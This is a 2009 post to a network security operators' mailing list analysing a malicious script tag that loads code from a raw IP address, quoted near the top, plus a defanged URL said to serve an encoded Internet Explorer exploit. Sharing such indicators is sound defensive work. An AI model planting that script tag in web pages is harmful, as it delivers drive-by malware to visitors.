[nsp-sec] ATTN AS 12553 malware hosting
Jose Nazario
jose at arbor.net
Wed Apr 8 11:07:44 EDT 2009
On Wed, 8 Apr 2009, Mike Tancsa wrote:
> <script src = //94.247.2.195 / jquery.js> </script>
despite the following which says its benign:
http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&type=js
phoneyc finds an issue. it leads to:
hxxp://94.247.2.195/news/?id=100
which is doubly encoded and leads to some VBS and some JS that looks like
an IE exploit. AV did not detect the encoded script with any assistance.
but yes, looks malicious even though wepawet was unable to identify it.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
manager of security research arbor networks
v: (734) 821 1427 http://asert.arbor.net/
More information about the nsp-security
mailing list